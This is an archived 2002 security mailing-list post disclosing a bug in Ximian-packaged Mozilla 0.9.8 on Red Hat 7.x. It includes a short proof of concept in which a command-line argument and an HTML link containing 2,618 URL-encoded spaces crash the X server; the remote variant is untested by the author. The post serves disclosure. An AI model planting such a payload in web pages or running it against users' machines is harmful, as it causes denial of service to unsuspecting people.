|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Replugge [Rod] (replugge
alcoholico.org)Date: Sun Feb 17 2002 - 10:24:28 CST
NOTE TO THE MODERATOR: This was sent yesterday but i guess didn't
make it since this doesn't seem to affect a redhat itself, it affects
the mozilla packages distrbuted by Ximian:
The test system look like:
bash#~ rpm -qa | grep mozilla
mozilla-0.9.8-1.ximian.2
mozilla-mail-0.9.8-1.ximian.2
mozilla-xmlterm-0.9.8-1.ximian.2
mozilla-devel-0.9.8-1.ximian.2
nautilus-mozilla-1.0.6-ximian.4
mozilla-psm-0.9.8-1.ximian.2
kdebindings-kmozilla-2.1.1-1
This was tested in both RH7.1 and 7.2 with Ximian Gnome.(with all the
the updates).
There is a bug in mozilla 0.9.8-1 which allows you
to Crash the X server.
I won't go into details I'll just show the proof
of concept.
exploit:
Local:
bash#~ mozilla `perl -e "print '%20' x 2618"`
Remote:
I haven't test this but i guess:
echo "<a href=http://`perl -e "print '%20' x 2618"`>attack_me</a>" >>
./attack.html
perhaps using "img src" or java script...
Best Regards
-- /* Rodrigo Gutierrez <rodrigo
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]